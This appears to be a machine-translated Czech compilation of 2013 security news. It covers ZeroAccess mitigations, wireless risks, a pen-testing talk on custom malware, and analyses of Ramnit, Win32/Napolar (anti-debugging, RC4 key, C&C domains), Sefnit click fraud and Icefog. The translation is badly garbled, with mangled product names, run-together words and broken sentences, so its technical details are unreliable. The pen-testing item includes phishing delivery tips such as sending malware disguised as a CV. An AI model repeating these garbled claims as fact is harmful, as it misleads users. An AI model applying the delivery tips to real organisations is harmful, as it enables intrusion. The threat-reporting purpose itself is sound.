Palo Alto Networks Firewall
Šňupat
Symantec AV
Aplikace Symantec Endpoint Protection signatur IPS
Zmírňování a doporučení:
Společnost Symantec doporučuje zákazníkům používat vrstvený přístup k zabezpečení jejich prostředí, s využitím nejnovějších technologií, včetně Symantec Enterprise-Wide monitorování bezpečnosti od hrany k koncového bodu. Pro techniku, monitorovaných / řízen MSS, zajistit, aby všechny podpisy jsou aktuální, včetně koncových technologií. Zajistěte, aby všechny operační systémy a veřejné čelí stroje mají nejnovější bezpečnostní záplaty, a antivirový software a definice aktuální. Zajistěte systémy mají běžící firewall, jsou zbytečné porty uzavřeny / zablokovány a nevyužitých služeb jsou zakázány. Ujistěte se zaměstnanci vzděláváni o sociálním inženýrství a phishingové techniky. Co můžete očekávat od MSS:
Symantec MSS SOC bezpečnostních analytiků bude i nadále pečlivě sledovat, analyzovat a ověřovat všechny události svědčí o ZeroAccess Trojan. MSS bude i nadále provádět průběžné upřesnění detekce.
Přenosný USB disk opravuje malware zmrzačeného stroje
5.10.2013 Viry
Malwarebytes zahájila Techbench , nástroj, který pomáhá IT pracovníkům opravit a obnovit i ty malwarem infikovaných počítačů. 16GB USB prostě musí být zapojen do infikovaného počítače, než dojde k automatickému vyhledání a odstraní i ty nejpokročilejší trojské koně, spyware, červi a další škodlivý software.
Techbench karantény automaticky všechny škodlivého softwaru na USB, aby se zabránilo reinfekci. Tento software také používá Malwarebytes chameleon, produkt určený k neutralizaci moderní malware automatické protiopatření. Produkt byl přímo koncipována zakladatel a generální ředitel společnosti Malwarebytes 'Marcin Kleczynski, sám bývalý počítačový technik. . Marcin je mnoho hodin upevňovací infikovaných počítačů ve svém místním obchodě PC opravu, i když už AV program nainstalovaný, bylo to, co zpočátku ho inspirovala k nastavení Malwarebytes komentoval zahájení, Kleczynski řekl: "Techbench je vyroben techniky, pro techniky. Jako IT podpora pracovníka, není nic víc frustrující, než se zabývá nekonečné řady počítačů infikovaných tvrdohlavý malware, každý potřebuje jiný typ opravy. "Techbench bude tento problém řešit tím, že poskytuje něco, co může být jednoduše zapojen a automaticky odstranit problém. Doufejme, že to bude dělat životy počítačové techniky, která trochu lépe. "
Je bezdrátové připojení na trojského koně v zabezpečení vaší sítě? 3.10.2013. Bezpečnost | Viry Podle Rogera Klorese z WatchGuard technologie, chytré telefony a tablety nyní tvoří asi 25% zařízení používaných pro práci v USA. Bezdrátový, mobilita a BYOD jsou součástí nezastavitelné vlny, založené na všeobecném spotřebitele a vzdálené pracovník použití. S novým bezdrátovým standardem rychleji, 802.11ac, který má být letos ratifikována, a 4G neustále roste, poptávka po rychlé bezdrátové na pracovišti zvyšuje neúprosně.
Zatímco toto vytváří řadu příležitostí, ale také vytváří velké množství problémů. Pokud například váš existující bezdrátové síti je nejistý, a to na té bázi písku se vždycky nepodaří. Historicky, pro mnoho organizací, velkých i malých, bezdrátové byla taktická řešení zaměřeném na uživatele poptávky po notebooku (a následně smartphone a tablet), mobilita v kanceláři. Protože poptávka a uživatelé se zvýšily organizace typicky přidal více přístupových bodů. Dnes přístupové body jsou významným prvkem uživatele LAN. I když nemusí nést nejvyšší množství dopravy, obvykle bude nést nepřiměřené procento důvěrných obchodních informací. Problém, který má tato, a to zejména pro menší organizace, je to, že přístupové body sedí uvnitř sítě a připojení k němu, jsou často vnímána jako jsou pokryty mnoha existujících řešení pro zabezpečení internetových bran. To může znamenat, že jsou připojeny přímo k důvěryhodné síti (vnitřní LAN). Pokud se to stane, to vyvolává velké bezpečnostní riziko. Navíc existuje riziko, i když bezdrátové připojení je řízena prostřednictvím samostatné virtuální LAN (VLAN). Wireless se připlížil na mnoha organizací. V situaci, kdy byla poskytnuta jako doplňkovou službu pro určité zvláštní zaměstnanců a jako host službu poskytnout přístup k internetu pro návštěvníky (a pracovníci), se postupně na významu. Dnes, s blížící se více Gb 802.11ac bezdrátovým standardem, nyní můžeme předvídat zásadní posun od připojení k bezdrátové síti. Hlavním problémem je to, že posouzení rizik a bezpečnosti rozmístěny po celém bezdrátové nedrží krok s tempem změn. Zatímco mnoho skutečných hrozeb bezdrátové použití se nezměnily, zvyšující se tempo zavádění výrazně zvýšily rizika organizace. Firmy často nejsou vědomi rizik, protože mají vícevrstvé obvodové bezpečnosti v místě a neuvědomují si, že bezdrátový přístup je ničena, že bezpečnost. Kromě toho chybně "mělčina mentalitou ještě žaluzie uživatelům rizika. Uvědomují si, existuje spousta hackerů tam, ale prostě si myslím, že tam je tak mnoho cílů, je nepravděpodobné, že bude ten, kdo je napaden. Potenciální rizika: misconfiguration - Pokaždé, když se nový přístupový bod, který zní, existuje riziko, že může být špatně nastaven. Pokud se tak stane, budou pravidla, která byla zavedena k ochraně sítě nesmí být důsledně uplatňována. Muž ve středním útoku - Tento typ útoku je místo, kde někdo představuje SSID (Network Address), která předstírá, že je něco, co to není " t, např. vaší firmy bezdrátové jméno. Útočníci zachytit jména a hesla uživatelů, kteří se přihlásili, a předávat je prostřednictvím, takže není zřejmé, co mají udělat. Mimochodem, to je riziko, že každý, kdo se přihlásí na internetové kavárny, hotelové haly, atd. trvá. Připojení neoprávněných uživatelů - Nepovolené uživatelé mohou připojit k síti. To může být nespokojený ex-zaměstnanci, může být prostřednictvím krádeže identity nebo prostřednictvím "man-in-the-middle attack". Většina organizací jsou zranitelní, protože většina organizací má něco cenného v síti, jako jsou údaje o kreditní kartě, online bankovní informace, důvěrné detaily ze mzdy, nebo informace užitečné ke konkurenci. Vložení škodlivého kódu nebo odcizení kódu prostřednictvím bezdrátového připojení - připojení přímo do důvěryhodné sítě vytváří zranitelnost dat pro programy krást, stejně jako programy zničení dat -. zejména nespokojených jedinců a ex zaměstnanci krádež dat aplikací na mobilních zařízeních - Zatímco Apple není imunní, problém je zvláště škodlivých aplikací zhoubné na zařízení se systémem Android. Rogue přístupové body - Dobře míněné zaměstnanci (a někdy méně dobře míněný) můžete dát další přístupové body bezdrátové sítě poskytovat větší pokrytí, bez svolení či vědomí managementu, vytvářet bezpečnostní rizika. TKMaxx podvod - je na který se nezapomíná TKMaxx podvody s kreditními kartami, kdy hackeři přístup k údajům o 45 milionů platebních karet, a to prostřednictvím nezabezpečené bezdrátové sítě LAN. Pomocí bezdrátové a mobilita stává stále všudypřítomné, nyní je ten správný čas na přezkoumání rizik, bezpečnostní politiky a ochrany, které jsou v místo. Většina společností má politiku pro bezdrátové a mobilitu, které jsou out-of-date. Vzhledem k tomu, že je výrok a řízení politik, které pohání chování zaměstnanců, out-of-datle a bez dozoru politiky bude téměř jistě povede k nesprávnému chování zaměstnanců, pokud jde o mobilní bezpečnosti. Revize politiky, snad tím, že některé náročné uživatele, kteří pochopit, co se děje s technologií a aplikací, a to nejen dává jasnou zprávu o činnosti, že jste vážně o mobilní bezpečnosti, ale může být často velmi zajímavý a poučný zážitek. Je také důležité, aby uživatelé byli vědomi toho, že zabezpečení bezdrátové sítě je nejen nezbytná, ale také být řízeny a vykazovány. Bezdrátové změny rizikového profilu zvyšuje využití a více uživatelů jsou povoleny. Mnoho hrozeb, se změnily a stěhovali se z podniků do menších podniků. Nicméně, mnoho organizací nebyly přezkoumány své bezdrátové mobility a rizika v souladu s rostoucí bezdrátové použití. Oni jsou často vyvalit širší přístup a přístupové body bez ohledu na důsledky pro zabezpečení. Pro ty, kteří s PCI nebo bezpečnostních dat a úvah, bezpečnost recenze je zásadní. Vše začíná přezkumu politik a rozpoznávat některá rizika. Na praktické úrovni, tam jsou některé rychlé zisky:
Používat svůj notebook, tablet nebo telefon k vyhledání síťových připojení a ujistěte se, že všechny síťové adresy pod jméno vaší společnosti jsou tvoje. Jako další bezpečnostní zvážit změnu SSID (Network ID) na něco jiného než název vaší společnosti. Ujistěte se, že jsou všechny přípojky přes zabezpečené VPN Ujistěte se, že všechna připojená zařízení mají alespoň antivirovou bezpečnost, včetně všech tablety a smartphony. Použijte dvoufaktorovou autentizaci na ochranu proti krádežím identity. Jako absolutní minimum, vyžadovat, aby všichni uživatelé mají kód PIN pro jejich zařízení.
Pen Testování Použití živého malware stává nutností
3.10.2013 Bezpečnost | Viry BERLIN -Penetrační testování má za sebou dlouhou cestu za posledních deset let, odvíjející se od poněkud kontroverzní praxi de facto osvědčených postupů v podniku na trhu. Že vývoj se nezastavil v žádném případě, a jedna z věcí, které odborníci říkají, že musí být v žádném komplexní test nyní je používání živých, vlastní malware.
Pen testery často používají vlastní nástroje, které jejich společnosti nebo-postavil, ale použití živých malware není nutně tak časté, jak by mělo být, řekl Gunter Ollmann, technický ředitel společnosti Active IO v rozhovoru na konferenci Virus Bulletin 2013 tady čtvrtek. Myšlenka použití čerstvě vyrobené malware je lépe reprodukovat efekt skutečného útočníka zamířil na cílové síti. Pen testování v mnoha ohledech je o hraní role škodlivého činitele, ale testy mohou být omezeny ve svém rozsahu, a proto méně účinné, pokud nástroje, jako jsou živé malware nejsou použity, Ollmann řekl.
"Malware představuje naprosté většiny porušení. Potřebujeme pera testovací metodiky kopírovat stávající profily útočník, "řekl. "Musíme zjistit, které vrstvy jsou vlastně detekci malware. Věděli malware ohrozit hostitele? Je to použitelné? "
Ačkoli tam jsou miliony a miliony vzorků malwaru jsou k dispozici v databázích v těchto dnech, Ollmann řekl, že to omezené použití v reálném světě penetrační test. Vytvoření nový, jedinečný malware a házet, že v síti zákazníka je mnohem efektivnější a realističtější způsob, jak otestovat síťové obrany.
"Nestojí to házení včerejší malware na cíl," řekl Ollmann. "Off-the-shelf malware je triviální odhalit."
Nicméně, to není záležitost prostě psaní kousek malware a vidět, zda je možné ji proklouznout zákazníka bezpečnostních systémů. Ollmann řekl, existuje celá řada důležitých faktorů, aby zvážila v tomto procesu, včetně toho, zda cílová síť používá proxy, jak zvládnout řídicích a zda chcete vytvořit více verzí daného typu malware.
"Řekl bych, že byste měli vytvořit strom nového škodlivého kódu. Určitě byste měli předem vyzkoušet, ale pouze proti audiovizuálních nástrojů, které můžete zabránit nahráním cloud služeb, "řekl. "Vytvoření značky pro každou konkrétní pracovní místo, a vyberte si C & C opatrně. Většina podniků zaměstnávat proxy, takže je pravděpodobné, že potřebujete, aby vaše malware proxy vědomi dostat přes ty obranu. "
Z hlediska metod pro získání nově vytvořený malware do cílového síti, není žádným překvapením, že se pokusil-a-pravda metody, jako je sociální inženýrství a kopí phishingu jsou stále nejúčinnější. Ollmann řekl, e-mail je jedním z více účinných způsobů, jak se dostat malware do cílové sítě.
"E-mail s URL na stažení obvykle pracuje," řekl. "Jedna věc, kterou jsem našel, že je velmi úspěšný prochází společnosti nábor webu a pak, když požadují životopis nebo CV, pošlu ji s malware připojené a je to tady."
Ramnit Malware Vytvoří FTP síti z počítačů, obětí 3.10.2013 Viry | Kriminalita | Hacking
Červ Ramnit se objevil v roce 2010. Během roku bylo více než osm milionů infikovaných počítačů po celém světě. Zpočátku malware právě soubor infikuje šíří vyměnitelné jednotky. Později se stal lépe poznat za krádež uživatelských dat prostřednictvím prohlížeče injekcí, se zaměřením bankovní nebo hry od uživatele. Při prohlížení malware nedávno jsme zjistili, nové vzorky s aktivními domén. 20130930 Ramniit-1
Ramnit stále převládá a staré domény jsou pravidelně aktualizovány. Některé z oblastí jsou již "sinkholed" (přesměrován komunikovat pouze s řízenou serverem a ne s jeho škodlivých vývojáři) jinými výzkumníky bezpečnosti. Na rozdíl od jeho typických charakteristik (malware infikuje .exe / html soubory, hákování procesu aplikace Internet Explorer) Ramnit nastavuje FTP server na oběti stroj. Tento server FTP stává součástí RMNetwork FTP. Tento server FTP podporuje následující příkazy: USER, PASS, CWD, CDUP, QUIT, PORT, PASV, TYPE, MODE, RETR, STOR, APPE, REST, RNFR, RNTO, ABOR, DELE, ŘSD, MKD, LIST NLST, SYST, STAT, HELP, NOOP, SIZE, EXEC, a PWD. 20130930 Ramniit-2 Pomocí těchto příkazů útočníky můžete ovládat počítač na dálku, krást jiné citlivé soubory a spustit další škodlivé soubory. Infikované počítače, které jsou firewallem nebo sedět za překlad síťových adres nemůže "spojit" RMNetwork FTP, ale mohou komunikovat s řídicím serverem pomocí TCP port 443 nebo 447 s vlastní šifrování. 20130930 Ramniit-3 Při pohledu na malware v doménových jmen, které se zdají být vytvořeny domény algoritmus generace. Nicméně, tyto aktivní domény napevno v binární. To znamená, že nové binární soubory jsou vytvářeny s malware stavitel nástroj a šíří jiným malwarem, nebo phishing. Tyto domény jsou šifrovány pomocí XOR algoritmu s různými klíči pro každý vzorek. 20130930 Ramniit-4 McAfee zákazníci jsou již chráněni před touto hrozbou.
Twitter DM spam / malware
Spam | Viry
Tam byl nedávný plivl účtů Twitter odesílání přímé zprávy (DZ) s jinými, které jsou buď spam nebo odkaz na malware pomocí zkrácené URL. V některých případech mohou být účty odesláním DM, bylo odcizeno díky slabých hesel, malware napadení na počítači uživatele, nebo aplikace třetích stran, ne hrát pěkná. Pověsti o Twitter, které byly napadeny hackery jsou také prošel kolem, jsem neviděl žádný důkaz v obou směrech. Pokud jste se stali obětí účtu Twitter cvrlikání nebo zaslání DM bez vašeho souhlasu, dejte nám vědět přes náš kontaktní stránku nebo komentář níže. Pokud máte DM od někoho, kdo se zdá být spam nebo má podezřelý odkaz v něm prosím, předat ji dál.
Buďme opatrní, tam venku!
Win32/Napolar - Nový bot na bloku
27 září 2013 Viry | BotNet
K dispozici je nová bot na bloku . ESET označuje jako Win32/Napolar zatímco její autor nazývá solarbot . Tento kus malware přišel do naší pozornosti v polovině srpna kvůli jeho zajímavé techniky anti- ladění a kód injekce . Je to v poslední době přitahuje všeobecnou pozornost, když byla diskutována na různých fórech reverzního inženýrství .
Tento malware může sloužit více účelům . Tři hlavní z nich jsou k provádění popření servisních útoků , aby mohly působit jako SOCKS proxy server , a krást informace z infikovaných systémů. Malware je schopen připojit do různých prohlížečích ukrást informace, které jsou předloženy do webového formuláře .
Jsme odhalili mnoho podrobností o tomto bot , protože se stala aktivní na konci července , s in- the-Wild infekce začíná v polovině srpna . Tam byly zprávy o tisíc infekcí , mnoho z nich v Jižní Americe. Mezi země s nejvíce infekcí je Peru, Ekvádor a Kolumbie . Další informace o geografické rozložení na tuto hrozbu lze nalézt na virusradar .
Autor Win32/Napolar používá webové stránky na podporu to. Na webových stránkách vypadá velmi profesionální a obsahuje podrobné informace o bot , včetně nákladů ($ 200 USD za každé sestavení ) a dokonce kompletní změnu -log evoluce kódu.
Přestože jsme dosud viděli přímo Win32/Napolar distribuován ve volné přírodě , je pravděpodobné, že tato hrozba se rozšířila přes Facebook . Vzhledem k tomu, malware má schopnost ukrást Facebook pověření může jeho provozovatel použít tyto pověření k posílání zpráv z napadených účtů a snaží se infikovat oběti přátele. Níže je seznam souborů , které jsme viděli používá tento malware rodiny:
Je zajímavé, že použití zdvojených přípon souborů (* . JPG.EXE , * . TXT.EXE a tak dále) poplést u souboru skutečné rozšíření jestarý trik , který pochází z Windows 95, ale zřejmě stále v provozu. Co je legrační , o použití v tomto konkrétním případě je , že autor Win32/Napolar Nezdá se, že si uvědomit, že . Com je platná , i když poněkud starý, rozšíření pro spustitelné soubory a že tyto názvy souborů by umožnilo jejich provádění , aniž bykdy . EXE . Velmi nedávné blog od našich kolegů v AVAST potvrzuje , že také viděli podobné infekce vektorů .
V tomto blogu , ukážeme některé anti- ladění triky používané Win32/Napolar . Tyto triky byly pozorovány v prvních verzí tohoto malware rodiny. Nejnovější varianty také použít třetí strany packers vyhnout antivirový software a zpomalit ruční reverzní inženýrství .
Budeme pak vysvětlit Win32/Napolar velení a řízení (C & C ) protokol. Na závěr si ukážeme některé z informací, které byly načteny z propagační webové stránky před tím, než byl uveden do režimu offline . Anti- ladění techniky
Při analýze Win32/Napolar binární soubory , první věc, kterou musíte vědět je, že neexistuje žádný platný vstupní bod v záhlaví PE , jak je znázorněno na obrázku níže .
01_original_entrypoint_to_0
První instrukce, které jsou spouštěny při startu binární jsou uloženy v závitu místní funkce Storage ( TLS) . K dispozici jsou dvě TLS přiřazené funkce . První TLS funkce nedělá nic . Druhá funkce dešifruje více kódu pomocí šifrovací algoritmus RC4 a klíč 0xDEADBEEF . Dešifrovat kód je zapsána jako třetí funkce TLS před druhým funkce vrátí , jak je uvedeno v kódu extraktu níže .
02_inserting_third_tls
Třetí TLS Funkce dešifruje zbytek kódu před voláním hlavní část malware. Malware používá jiné triky , aby se sám obtížnější analyzovat :
Veškeré dovozy jsou řešeny v běhu s použitím hash namísto dovozového jmen. Interakce s operačním systémem se většinou provádí přímo voláním neregulérní funkce ntdll knihovny namísto použití standardního API . Vše je kód pozice nezávislé .
Chcete-li zjistitoffset vlastní kód, který bude dešifrovat , Win32/Napolar vyhledává prostřednictvím svého paměti pro operační kód 0 × 55 . Tento operační kód představuje "push EBP ", první instrukce současné funkce v jazyce symbolických instrukcí. Pokud tento pokyn nahrazuje 0xCC ,opcode pro softwarový zarážky budedešifrování kódu nebude fungovat. To je chytrý způsob, jak měnit chování malwaru , pokud je analyzován s debugger a je-li software zarážka je kladen na první instrukce z TLS .
Win32/Napolar má více anti- ladění triky. Chcete-li dynamická analýza těžší , bude Win32/Napolar vytvořit podřízenou proces sám o sobě a bude ladit tuto novou instanci . Screenshot ukazuje volání CreateProcess .
05_create_process_debug_only
Software na ochranu Technika self- ladění bylo vidět dříve, ale v případě Win32/Napolar , trik se děje v hlavní části malware , ne v balírny .
Jakmile je laděný proces zahájen, Win32/Napolar zadejte smyčku, která zpracovává události ladění vrácené funkcí WaitForDebugEvent . Pseudokódu pro smyčku manipulaci ladících událostí je uveden níže.
04_pseudo_code_debug_loop
První událost zpracována tímto kódem je CREATE_PROCESS_DEBUG_EVENT . Tato akce se koná při spuštěníladěný proces . V tomto případě se hlavní proces analyzovat MZ a PE hlavičce odladěné procesu za účelem získání offset a velikost pozice nezávislé kódu. To se pak zařadí další oblasti paměti v odladěné procesu, ve kterém k injekci kódu . Tím se vytvoří dvě kopie stejného kódu ve stejném procesu.
Další akce je EXCEPTION_DEBUG_EVENT . V tomto druhém případě je hlavní proces přepíše první TLS funkce binární tak, aby přesměrování provedení na začátku spustitelný pomocí Push - instrukce RET . To opět dešifruje hlavní tělo škodlivého softwaru a umožňuje to provést v dětském procesu. Jedná se o kód podřízeného procesu , který pak pokračuje injekci se do všech běžících procesů sub- procesy a hákování různé funkce skrýt svou přítomnost v systému a zachytit požadované informace.
Konečně, hlavní proces obdrží EXIT_PROCESS_DEBUG_EVENT událost , zastaví ladění voláním funkce DebugActiveProcessStop a ukončí svůj vlastní proces pomocí NtTerminateProcess .
graf
Jednou z hlavních charakteristik Win32/Napolar je jeho schopnost krást informace , když uživatel vyplní webový formulář ve webovém prohlížeči . Trusteer prohlížeč ochrana pravděpodobně zastaví malware z zachycení těchto informací. To je důvod, proč malware má specifické kontroly pro Trusteer produktů. To bude iterovat všech běžících procesů a zvláště zabít jakýkoliv proces, který má řetězec " Trusteer " v něm. Jsme neměli provádět žádné testy potvrdit , zda tento pokus o zakázání Trusteer produkt společnosti je úspěšný , nebo ne. síť chování
Při komunikaci s jeho velení a řízení serveru , Win32/Napolar používá protokol HTTP . První dotaz odeslán robotem na velení a řízení serveru obsahuje následující informace :
Verze bot Aktuální okna uživatelské jméno infikovaného uživatele název počítače Jedinečný identifikátor bot Verze operačního systému Typ systému , který může být 32 nebo 64 bit . Ve skutečnosti , to bot podporuje oba typy architektury .
Server pak odpoví příkazybot potřebuje vykonat . Tyto příkazy jsou šifrovány pomocí RC4 jebot jedinečný identifikátor používá jako šifrovací klíč . Bot podporuje celou řadu příkazů z informací krádeže a SOCKS proxy , aby odmítnutí služby , download , provádění a aktualizace . Každý příkaz májedinečný identifikátor uložen jako jednoho bajtu a informace po tomto bytu obsahuje parametry příkazů . Následující obrázek znázorňuje dopravní výpis komunikace mezi hostiteli infikovaných Win32/Napolar a jeho řídícím a kontrolním serverem.
06_napolar_POST
Následující obrázek ukazuje dešifrování tohoto příkazu pomocí vhodného klíče. První bajt obsahu přijímaného je 0xC , a to pokyn bot na spaní. Tento parametr je řetězec , " 600 ", který představuje počet sekund, po kterébot potřebuje spát.
07_decrypted_cnc_nop
Viděli jsme nejméně sedmi různých velitelských a kontrolních servery používané Win32/Napolar . Většina z nich zůstali jen on-line na pár dní , aby mohl provozovatel přesunula k nové síti . To by mohlo znamenat, že tato bota je aktivně používán ve volné přírodě . Níže je seznam doménových jmen , kde jsme v poslední době pozorovat velitelské a řídící servery :
dabakhost.be terra - araucania.cl xyz25.com yandafia.com elzbthfntr.com alfadente.com.br
Tam jsou některé odkazy na TVZ v malware kódu. Nejpřesněji , některé konfigurační linky a odkazy na konfigurační soubor pro TOR . Během naší analýzy malwaru , nezdálo se , aby jakékoliv použití těchto údajů. To by mohlo být nějaký spící funkce , která nebyla aktivována ve vzorcích jsme analyzovali . Propagační web
Autor Win32/Napolar se zdá být velmi upřímný , kteří chtějí prodat svůj nový malware. On dal dohromady velmi profesionálně vypadající webové stránky, kde se chlubí , že jeho bot je " profesionální shell kód založený bot " , s odkazem na skutečnostmalware je pozice nezávislé .
08_solar_website1
Na webových stránkách také poskytuje informace pro potenciální zákazníky. Například, kompletní kód pro velení a řízení serveru lze nalézt zde , php skript běží s backend SQL databáze . Kód velení a řízení serveru potvrzuje naší analýzy síťového protokolu používaného Win32/Napolar malware.
Propagační webových stránkách také poskytuje několik příkladů pluginů, které mohou být použity malware operátorů. Zásuvné moduly musí být napsány pomocí programovacího jazyka Delphi . Ukázkové pluginy ukazují, jak lze zobrazit zprávu na infikovaném oběti systému , zjistit, které verze je nainstalován antivirový program na oběti systému , a dokonce, jak ukrást Bitcoin peněženky .
Konečně, webové stránky předložil i kompletní záznam změn provedených bota zdrojového kódu , včetně informací o nových funkcí a oprav chyb . Na webových stránkách se zobrazí první položky v changelogu vyrobený 14. července . To se hodí naše časovou osu , protože jsme viděli první instance této bot ve volné přírodě na začátku srpna. Datum registrace pro název domény , kde je umístěnobsah je první den v srpnu , další náznak toho, žezačátek akce je poslední .
09_solar_website2 závěry
Win32/Napolar je nový bot, který se vynořil v červenci a začal pozorovat ve volné přírodě v srpnu . Má zajímavé techniky pro boj proti reverzní inženýrství . Nejpozoruhodnější bod o tomto malware je, jak otevřeně , že je podporován na webu jeho tvůrcem . Reklama je pravděpodobně stejný , který byl identifikován Dancho Danchev na webroot v červenci . Viděli jsme mnoho zpráv na různých fórech, které podporují tuto bot , kromě existence veřejně přístupné webové stránky. Jak již bylo výše zmíněno v případě Foxxy , to je další dobrý příklad specializace počítačové kriminality operací , kde jsme nyní jasně mít autory , které vytvářejí malware a prodávají je do jiných skupin, které budou provozovat.
Ačkoli tato bot má funkce podobné jiným rodinám jako Zeus či SpyEye , může získat na popularitě , protože její autor se aktivně údržbu, a kvůli jeho snadné použití a jednoduchost , s jakou mohou být vytvořeny pluginy . analyzované soubory
Díky Lubomíra Trebula a Joan Calvetem za pomoc při analýze tohoto malware.
Krádež Nový Click podvodům Malware Souvisí Tor Botnet 27. září 2013. Viry | Hacking tor_clickfraudKRADMÝ NEW CLICK PODVODŮM MALWARE SOUVISÍ TOR BOTNET Malware rodina, pravděpodobně vyvinutý stejných autorů, kteří vybudovali masivní botnet nedávno objevil na síti Tor , byl oživen s kradmý nové click-podvod podvod.
Microsoft hlásí vyrážku nových podvodná kliknutí činnosti spojené s Sefnit malware, který byl myšlenka mrtvá a pohřbená v roce 2011, Microsoft Malware Protection Center výzkumník Geoff McDonald napsal v blogpost tento týden. McDonald řekl, Microsoft objevil nový podvodná kliknutí komponenty do Sefnit malware v červnu, jeden, který používá open source 3proxy projektu. Původně Microsoft uvedl, že klasifikovala podvodná kliknutí část Sefnit jako Mevade malware, ale nyní je považuje za stejné rodiny.
"Botnet z Sefnit hostovaných serverů proxy se používá k přenosu HTTP předstírat, kliknout na reklamu," řekl McDonald.
Použití proxy udržuje hladinu hluku dolů na Sefnit činnosti, na rozdíl od předchozích verzí malware, který by unést kliknutí z výsledků vyhledávání, posílá ty prokliky přes agenturu na webovou stránku, připomínající uživatele určení.
"Tato kliknutí jsou obecně považovány za poměrně vysokou hodnotu a je těžké odhalit podvody z pohledu," řekl McDonald.
Tam nebylo nic zastavit pozorný uživatele, nicméně, od všiml, že se nejedná přistáli na stránky, které hledali a předložení otázce bezpečnostní výzkumník, uvedl Microsoft. Nežádoucí pozornost, odborníci si myslel, způsobil Sefnit gang zavřít krám.
V červnu byl malware znovu nalézt funguje jako proxy služby na 3proxy.
"Nová verze Sefnit nevykazuje žádné zřetelné viditelné příznaky uživatele upozornit na botnet," řekl McDonald. "To jim umožnilo vyhnout pozornost od antimalware vědců za pár let."
Botnet serverů proxy se odesílá požadavky, nebo falešné prokliky, prostřednictvím sítě affiliate programy, jako je vyhledávání Mywebsearch [.] Com a oprávněné reklamní agentury, aby nakonec podvádět legitimní inzerenta.
Společnost Microsoft poskytuje příklad použití Groupon. V Sefnit autoři pravděpodobně Mywebsearch pobočka, a používat službu proxy přesměrovat provoz na affiliate na "falešné" kliknutím na reklamu na Google Groupon místě, šidit Groupon v tomto procesu. Prodejce musí platit společnosti Google za falešné kliknutí, Google má svůj podíl a následně vyplatí zbytek na Mywebsearch affiliate.
Chcete-li zachovat podvod trvale, malware autoři vybudovali časové prodlevy do systému tak, aby se malware nebude příliš často klikněte na reklamy, varování proti podvodům služby.
Microsoft uvedl, že Trojan Sefnit se šíří podél legitimní instalací aplikace File Scout, také vyvinutého Sefnit gangu.
"Konkrétně se předpokládá, že podobnou formátu XML strukturu pro C a C-stáhnout a provádět příkazy, jsou obě aplikace distribuovány, a dvě aplikace byly zpracovány 15 minutách po sobě se stejným překladačem," řekl McDonald.
Sefnit se šíří také na některých softwarových instalaci InstallBrain Bundler a přes eMule peer-to-peer sítě.
"Autoři přizpůsobily své mechanismy klikání způsobem, který bere v interakci uživatele z obrazu při zachování efektivity," řekl McDonald. "Toto odstranění uživatelského interakce závislosti na metodice klikání byl velký faktor v Sefnit autoři budou moci zůstat mimo radarů zabezpečením výzkumných pracovníků v průběhu posledních několika let."
Mevade mezitím způsobil rozruch v polovině srpna, kdy odborníci uvědomili počet uživatelů Tor vyletěla z 500.000 na téměř 3 miliony, a spekuloval, že botnet se usídlil v síti a botmaster se používat ke komunikaci s ohrožen hostitelé a vyhnout se potenciálním takedown pokusy.
Rozhodnutí přejít na Tor, nicméně, byl jeho zkázou. Odborníci Damballa Labs uvedl, že příliv uživatelů Tor přitáhl nežádoucí pozornost k botnetu vedoucí k jeho odhalení. Výzkumník Mark Gilbert řekl Threatpost že botmaster byl pravděpodobně pronájmu části botnet Mevade pro click-podvod, adware podvody a dokonce i datové průsaků.
V Icefog APT: Často kladené dotazy
26.9.2013 Zdroj: Kaspersky Hacking | Viry Zde jsou odpovědi na nejčastěji kladené otázky týkající se Icefog, APT operací zaměřených subjektů v Japonsku a Jižní Koreji.
Co přesně je Icefog? Icefog odkazuje na cyber-špionážní kampaň, která působí nejméně od roku 2011. Je zaměřen na vládní instituce, vojenští dodavatelé, námořní a lodní stavební skupiny, telekomunikační operátoři, satelitní operátoři, průmyslové a špičkové technologie a média, zejména v Jižní Koreji a Japonsku. Je pravděpodobné, že posádka je zaměřena na organizace v západním světě, stejně jako v USA a Evropě.
Kdo jsou oběti? V tuto chvíli jsme nezveřejnění jména obětí. Kaspersky Lab je v kontaktu s dotčenými organizacemi, jakož i vládních organizací s cílem pomoci jim identifikovat a vymýcení infekce.
Co můžete říci o cílech útoků? Náš technický výzkum ukazuje, že útočníci měli zájem o cílení na množství subjektů, a to zejména v Jižní Koreji, Tchaj-wanu a Japonska. Patří dodavatelů obranného průmyslu jako Lig Nex1 a Selectron průmyslová společnost, loděnice jako DSME Tech, Hanjin Heavy Industries, telekomunikační operátoři, jako je Korea Telecom, mediální společnosti, jako je Fuji TV a Japonsko-Čína ekonomické asociace.
Skutečnost, že výše uvedené organizace byl zaměřen neznamená, že útoky byly také úspěšné. Kaspersky Lab je v kontaktu s dotčenými organizacemi, jakož i vládních organizací s cílem pomoci jim identifikovat a vymýcení infekce.
Jednou z nejvýznamnějších událostí, které se podílejí tato hrozba herce se konal v roce 2011, kdy japonská Sněmovna reprezentantů a dům členů rady bylo infikováno
Víme, celkový počet obětí? Jako obvykle, je-to obtížné získat přesný odhad počtu obětí. Jsme viděl jen část celkového obrazu, který zobrazuje několik desítek Windows obětí a více než 350 Mac OS X oběti. Je-je důležité zdůraznit, že drtivá většina obětí Mac OS X (95%) v Číně.
Proč říkáte Icefog? Jméno "Icefog" pochází z řetězce používané v rozkazech a jejich řízení serveru (C & C) název jedné z námi analyzovaných vzorků malwaru. Také potvrdil, že C & C je software s názvem "Tři Dagger" ("尖刀 三号"), při překladu z čínštiny.
Pro fanoušky bojových umění, "尖刀 三号" je podobný "三 尖刀", což je starověké čínské zbraně.
Poznámka: Jiný název pro backdoor použitého v těchto útocích je "Fucobha".
Co Icefog dělat? Ve své podstatě, Icefog je backdoor, který slouží jako interaktivní špionážní nástroj, který je přímo řízen útočníků. To neznamená automaticky exfiltrate data, ale je místo toho ovládán manuálně, díky útočníků provádět akce přímo na živých infikovaných systémů. Během Icefog útoků, několik dalších škodlivých nástroje a backdoory nahrát strojů obětí pro boční pohyb a dat průsaků.
Jak Icefog infikovat počítače? Icefog je distribuován do cíle pomocí kopí phishingové e-maily, které může být buď mají přílohy nebo odkazy na nebezpečné webové stránky. Útočníci vložit exploity pro několik známých zranitelností (např. CVE-2012-1856 a CVE-2012-0158) do aplikace Microsoft Word a Excel dokumenty. Jakmile jsou tyto soubory jsou otevřeny na cíl, je backdoor spadl do systému a návnada dokument se pak ukázalo, oběti. Lure dokument zobrazený na oběti při úspěšné realizaci exploitu.
